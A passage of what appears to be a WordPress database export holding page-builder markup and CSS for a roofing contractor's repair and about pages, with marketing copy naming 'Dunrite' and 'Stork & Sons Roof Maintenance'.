}\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bad42304-f956-4ff6-a71d-3d0927546977\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Determining the underlying issue is critical when diagnosing a roof repair. We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8f988807-9a52-467a-ae6e-048f9f4c3534\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8f988807-9a52-467a-ae6e-048f9f4c3534 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d7963526-9288-4aa2-9602-2bca93be416b\"} -->\n<style type=\"text/css\"> .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d7963526-9288-4aa2-9602-2bca93be416b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"f3c8d953-d75e-4cd0-a016-ebca0253c0de\"} -->\n<style type=\"text/css\"> .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f3c8d953-d75e-4cd0-a016-ebca0253c0de\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":471,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/4.jpg\" alt=\"\" class=\"wp-image-471\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"b2950aec-7a93-4bd2-bdf0-d978b7373e18\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2950aec-7a93-4bd2-bdf0-d978b7373e18\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":473,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/6.jpg\" alt=\"\" class=\"wp-image-473\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">COMMON ISSUES CAUSING ROOF DAMAGE.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li> Improper design/installation</li><li>Restrictive/absence of Ventilation</li><li>Fallen trees/branches Faulty Skylight </li><li>Premature ridge cap failure</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form&nbsp;<a href=\"https://cteisys.com/contact-layout-1/\">here.</a>&nbsp;We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Repairs','','inherit','closed','closed','','269-revision-v1','','','2022-08-24 17:04:00','2022-08-24 17:04:00','',269,'https://cteisys.com/?p=475',0,'revision','',0),(474,1,'2022-08-24 16:57:17','2022-08-24 16:57:17','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"60b023b9-e8c3-43e6-89ba-c3dfbd99479c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a687cc3b-6428-4919-81c1-fb1cd829e749\"} -->\n<style type=\"text/css\"> .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a687cc3b-6428-4919-81c1-fb1cd829e749 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"8e161f0c-c998-4842-8873-8f192f3cb764\"} -->\n<style type=\"text/css\"> .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e161f0c-c998-4842-8873-8f192f3cb764\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"6a2bf94f-4d60-433a-b525-d53bf9619216\"} -->\n<style type=\"text/css\"> .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a2bf94f-4d60-433a-b525-d53bf9619216\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"1a6b31cd-8a87-4edc-99f2-33dd2b097132\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-1a6b31cd-8a87-4edc-99f2-33dd2b097132\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roofing And Siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Dunrite Roofing has been serving the surrounding areas for over 30 years</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Bringing more than 30 years of experience to every job, Stork &amp; Sons Roof Maintenance provides reliable roofing in Bucks County and the surrounding Lehigh Valley areas. Our company is family owned and operated, and you can count on us for roofing, siding, and stucco services. We are passionate about the work that we do and pride ourselves on delivering high-quality work at fair, upfront, and honest pricing. We also specialize in siding and roofing repairs for those home that do not need a full replacement just yet. Our roofing experts work with all types of materials. including shingles, flat roofs, and siding. We do tear-offs and cleanups.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When you need fast, dependable results for your roof or siding, call Stork &amp; Sons Roof Maintenance today for a fast, fair, and free estimate!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d5c61675-ddb2-4433-a568-128785b48d5b\"} -->\n<style type=\"text/css\"> .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d5c61675-ddb2-4433-a568-128785b48d5b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"72780545-3bc2-4038-8814-1dd9138d037c\"} -->\n<style type=\"text/css\"> .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 